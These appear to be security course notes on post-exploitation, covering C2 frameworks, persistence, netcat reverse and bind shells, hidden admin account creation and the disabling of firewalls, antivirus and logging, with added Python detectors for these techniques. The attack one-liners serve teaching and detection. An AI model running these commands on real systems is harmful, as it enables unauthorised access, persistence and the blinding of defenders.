Command and Control (C2) Techniques

  • Definition: Frameworks for remote control of compromised hosts
  • Empire
    • PowerShell/Python-based, stealthy (avoids powershell.exe)
    • Modules: keylogging, credential dumping, lateral movement
    • Maintained by the Kali community
  • Covenant
    • .NET-based, cross-platform (Windows, Linux, macOS)
    • Web-based interface for managing implants
    • Used for executing .NET commands, dumping credentials and maintaining long-term access
  • Mythic
    • Cross-platform, CLI-focused, modular architecture
    • Supports custom payloads; robust API for automation

Automating Persistence

  • Scheduled Tasks & Cron Jobs
    • Windows:
      schtasks /create /sc hourly /tn "UpdateCheck" /tr "C:\payload.exe"
      • schtasks: manage tasks
      • /sc hourly: run hourly
      • /tn "UpdateCheck": task name
      • /tr "C:\payload.exe": executable path
    • Unix:
      0 * * * * /etc/payload.sh
      • Executes /etc/payload.sh at minute 0 every hour
  • Service Creation
    • Windows:
      sc create "MaliciousService" binPath= "C:\path\payload.exe" start= auto
      • Creates service MaliciousService to run payload on boot
    • Unix:
      • Place script in /etc/init.d/ and run:
        update-rc.d payload.sh defaults
      • Ensures script runs on startup
  • Registry Keys (Windows)
    • Persist payload via Run key:
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MyPayload /t REG_SZ /d "C:\path\payload.exe"
      • Adds MyPayload entry to run on user login
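Defender's view of the three mechanisms above, as an added example that is not part of these notes: a Python audit over constructed Windows event records (Security 4698 scheduled task created, System 7045 service installed, Sysmon 13 registry value set) that flags persistence entries whose executable lives outside the usual system paths. The record layout and the sample task/service names are assumptions made for the example.

```python
"""Flag persistence artifacts in Windows event records.

Added example, not part of the original notes. Covers scheduled tasks
(Security 4698), services (System 7045) and Run keys (Sysmon 13).
Records are constructed dicts with the relevant fields already
extracted; a real 4698 carries the task definition as XML.
"""
import re

# Executables launched from these roots are treated as expected; anything
# else (C:\ root, user profiles, temp directories) is flagged for review.
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
RUN_KEY = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run(once)?\\", re.I)

def untrusted_path(command):
    """True when the executable in command does not live under a trusted root."""
    exe = command.strip().strip('"').lower()
    return not exe.startswith(TRUSTED_ROOTS)

def classify(record):
    """Return a finding string for a persistence-related record, else None."""
    eid, d = record["event_id"], record["data"]
    if eid == 4698 and untrusted_path(d["command"]):
        return f"scheduled task {d['task_name']} runs {d['command']}"
    if eid == 7045 and untrusted_path(d["image_path"]):
        return f"service {d['service_name']} runs {d['image_path']}"
    if eid == 13 and RUN_KEY.search(d["target_object"]) and untrusted_path(d["details"]):
        return f"Run key {d['target_object']} -> {d['details']}"
    return None

def audit(records):
    """All findings, in input order."""
    return [f for f in map(classify, records) if f]

# Constructed sample records modelled on the commands in the notes above,
# plus two benign entries of the kind a Windows host normally carries.
SAMPLE = [
    {"event_id": 4698, "data": {"task_name": "\\UpdateCheck",
                                "command": "C:\\payload.exe"}},
    {"event_id": 4698, "data": {"task_name": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
                                "command": "C:\\Windows\\System32\\defrag.exe"}},
    {"event_id": 7045, "data": {"service_name": "MaliciousService",
                                "image_path": "C:\\path\\payload.exe"}},
    {"event_id": 13, "data": {"target_object": "HKU\\S-1-5-21-1\\Software\\Microsoft"
                                               "\\Windows\\CurrentVersion\\Run\\MyPayload",
                              "details": "C:\\path\\payload.exe"}},
    {"event_id": 13, "data": {"target_object": "HKLM\\Software\\Microsoft\\Windows"
                                               "\\CurrentVersion\\Run\\SecurityHealth",
                              "details": "C:\\Windows\\System32\\SecurityHealthSystray.exe"}},
]
```

Calling audit(SAMPLE) returns the three attacker-style entries and leaves the defrag task and the SecurityHealth Run value alone.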

Remote Shells

  • Definitions
    • Reverse Shell: Target initiates an outbound connection back to the attacker, which typically passes firewalls that only filter inbound traffic
    • Bind Shell: Target listens for connection; attacker connects to target port
  • Reverse Shell Example (Netcat)
    • Attacker Listener:
      nc -lvp 4444
      • -l: listen mode; -v: verbose; -p 4444: port 4444
    • Target Command:
      nc 10.0.0.2 4444 -e /bin/bash
      • Connects to attacker at 10.0.0.2:4444, spawns /bin/bash
  • Bind Shell Example (Netcat)
    • Target Setup:
      nc -lvp 4444 -e /bin/bash
      • Listens on port 4444, executes /bin/bash upon connection
    • Attacker Connects:
      nc 10.0.0.3 4444
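Detecting the two patterns above, as an added example that is not part of these notes: a Python classifier over constructed process-creation records (parent image plus command line, the fields a Sysmon event 1 or auditd EXECVE collector provides) that labels a netcat launch as a bind shell when it listens and attaches a shell, as a reverse shell when it connects out and attaches a shell, and ignores plain listeners and connectivity checks. The record layout and the sample parent paths are assumptions.

```python
"""Classify netcat shell launches from process-creation command lines.

Added example, not part of the original notes. Input records are
constructed (parent_image, command_line) pairs. A bind shell listens
(-l) and attaches a shell; a reverse shell connects out and attaches
a shell; a bare listener or a port check is not flagged.
"""
import shlex

SHELLS = {"/bin/bash", "/bin/sh", "/bin/zsh", "/bin/dash", "cmd.exe", "powershell.exe"}
NETCAT = {"nc", "ncat", "netcat", "nc.exe", "nc.traditional"}

def classify_shell(command_line):
    """Return 'bind', 'reverse' or None for one command line."""
    try:
        argv = shlex.split(command_line)
    except ValueError:          # unbalanced quotes: not parseable, not flagged
        return None
    if not argv or argv[0].rsplit("/", 1)[-1] not in NETCAT:
        return None
    # -e (and ncat's -c) hand the connection to a program; only shells count.
    attaches_shell = any(
        a in ("-e", "-c") and i + 1 < len(argv) and argv[i + 1] in SHELLS
        for i, a in enumerate(argv)
    )
    if not attaches_shell:
        return None
    # Short-option clusters such as -lvp carry the listen flag as a letter.
    listening = any(
        a.startswith("-") and not a.startswith("--") and "l" in a[1:]
        for a in argv[1:]
    )
    return "bind" if listening else "reverse"

def scan(records):
    """Return [(parent_image, kind, command_line)] for flagged records."""
    return [(p, classify_shell(c), c) for p, c in records if classify_shell(c)]

# Constructed sample records modelled on the commands in the notes above.
SAMPLE = [
    ("/usr/bin/bash", "nc 10.0.0.2 4444 -e /bin/bash"),
    ("/usr/bin/bash", "nc -lvp 4444 -e /bin/bash"),
    ("/usr/bin/bash", "nc -lvp 4444"),            # plain listener, not flagged
    ("/usr/bin/python3", "nc -zv 10.0.0.5 80"),   # connectivity check
    ("/usr/sbin/cron", "/bin/nc -l -p 9001 -e /bin/sh"),
]
```

In practice the parent image is the stronger signal: a shell attached to a socket whose parent is cron, a web server or an office application deserves a look regardless of the netcat flavour.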

Backdoors

  • Backdoors: mechanisms that bypass authentication to gain or maintain access to a system, network or application
  • Rootkits
    • Kernel-level software hiding processes and files
    • Example: ZeroAccess rootkit hides files, grants persistent kernel access
  • Trojans
    • Malware disguised as legitimate software to open backdoors
    • Example: Zeus Trojan steals banking credentials
  • Web Shells
    • Scripts uploaded to web server for remote control via HTTP
    • Example: China Chopper web shell provides command execution

Account Credentials

  • Credential Dumping
    • Extract credentials from memory or files
    • Tool Example: Mimikatz to dump plaintext passwords on Windows
  • Keylogging
    • Capture keystrokes to harvest usernames/passwords
    • Example: Emotet implants keylogger modules post-infection
  • Phishing Attacks
    • Craft emails/pages to trick users into revealing credentials
    • Example: 2016 attack on campaign staff using fake Google login
  • Adding New Accounts
    • Create hidden accounts for re-entry
    • Windows:
      net user backup_admin P@ssw0rd /add
      net localgroup administrators backup_admin /add
    • Linux:
      sudo useradd -m -s /bin/bash backup_admin
      echo "backup_admin:P@ssw0rd" | sudo chpasswd
      sudo usermod -aG sudo backup_admin
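Catching the useradd/usermod sequence above in logs, as an added example that is not part of these notes: a Python correlation over constructed syslog lines in the format shadow-utils writes for useradd and usermod, flagging any account added to a privileged group within a short window of its creation. The host name, PIDs and timestamps are constructed; the Windows equivalent would correlate Security events 4720 (user created) and 4732 (member added to a local group).

```python
"""Correlate account creation with privileged-group membership in auth logs.

Added example, not part of the original notes. Parses the syslog lines
shadow-utils writes for useradd and usermod and flags an account that
joins a privileged group within `window` seconds of being created,
the sequence the useradd/usermod commands above produce.
"""
import re
from datetime import datetime

PRIVILEGED_GROUPS = {"sudo", "wheel", "admin", "root"}
TS = r"(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d)"
NEW_USER = re.compile(TS + r" \S+ useradd\[\d+\]: new user: name=(?P<user>[^,]+),")
ADD_GROUP = re.compile(TS + r" \S+ usermod\[\d+\]: add '(?P<user>[^']+)' to group '(?P<group>[^']+)'")

def _when(ts):
    # Syslog timestamps carry no year; adequate for lines from a single year.
    return datetime.strptime(ts, "%b %d %H:%M:%S")

def correlate(lines, window=600):
    """Return [(user, group)] for privileged-group adds soon after creation."""
    created, findings = {}, []
    for line in lines:
        m = NEW_USER.search(line)
        if m:
            created[m["user"]] = _when(m["ts"])
            continue
        m = ADD_GROUP.search(line)
        if m and m["group"] in PRIVILEGED_GROUPS and m["user"] in created:
            age = (_when(m["ts"]) - created[m["user"]]).total_seconds()
            if 0 <= age <= window:
                findings.append((m["user"], m["group"]))
    return findings

# Constructed auth.log excerpt: backup_admin mirrors the commands above;
# deploy is a routine account that joins a privileged group hours later.
SAMPLE_LINES = [
    "Mar 10 12:00:01 host useradd[1201]: new user: name=backup_admin, UID=1001, GID=1001, home=/home/backup_admin, shell=/bin/bash",
    "Mar 10 12:00:03 host usermod[1205]: add 'backup_admin' to group 'sudo'",
    "Mar 10 12:00:03 host usermod[1205]: add 'backup_admin' to shadow group 'sudo'",
    "Mar 11 09:15:00 host useradd[3301]: new user: name=deploy, UID=1002, GID=1002, home=/home/deploy, shell=/bin/bash",
    "Mar 11 09:15:02 host usermod[3305]: add 'deploy' to group 'docker'",
    "Mar 11 16:40:00 host usermod[3990]: add 'deploy' to group 'sudo'",
]
```

With the default 10-minute window only backup_admin is reported; widening the window to a full working day also surfaces deploy, which is the trade-off between noise and coverage this rule carries.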

Browser-Based Persistence

  • Malicious Browser Extensions
    • Hijack browser functions to capture data or execute code
    • Example: 2017 Copyfish extension hijack pushed ads
  • Cookies & Local Storage
    • Manipulate via XSS to steal session tokens
    • Example: 2018 Telegram web client vulnerability exploited local storage
  • Session Hijacking
    • Tools: Firesheep hijacks session cookies sent over unencrypted HTTP on open Wi-Fi
  • Browser Setting Modifications
    • Change homepage, proxy to redirect traffic
    • Example: Malicious script altering proxy to capture credentials
  • Defenses
    • Review/manage extensions regularly
    • Enforce HTTPS and Content Security Policy (CSP)
    • Keep browsers updated; audit for unusual behavior

Security Control Tampering

  • Disabling Firewalls
    • Windows:
      netsh advfirewall set allprofiles state off
    • Linux (UFW):
      ufw disable
    • Linux (firewalld):
      systemctl stop firewalld
  • Disabling Antivirus
    • Windows Defender: Disable real-time protection via PowerShell
    • Linux (ClamAV):
      systemctl stop clamav-freshclam
  • Tampering Security Policies
    • Windows: Export/import using secedit to weaken password/account policies
    • Linux: Modify PAM configurations in /etc/pam.d/ to allow stealth access
  • Disabling Security Logging
    • Windows:
      sc stop EventLog
      sc config EventLog start= disabled
    • Linux:
      systemctl stop rsyslog
  • Persistence via Scheduled Tasks
    • Windows:
      schtasks /create /tn "update" /tr "C:\update.bat" /sc onstart
    • Linux (cron): add the following line to the crontab (crontab -e):
      @reboot /etc/maliciousscript.sh
  • Disabling UAC
    • Windows: Modify UAC settings via registry or Local Security Policy
    • Linux: Weaken sudo by allowing passwordless execution in /etc/sudoers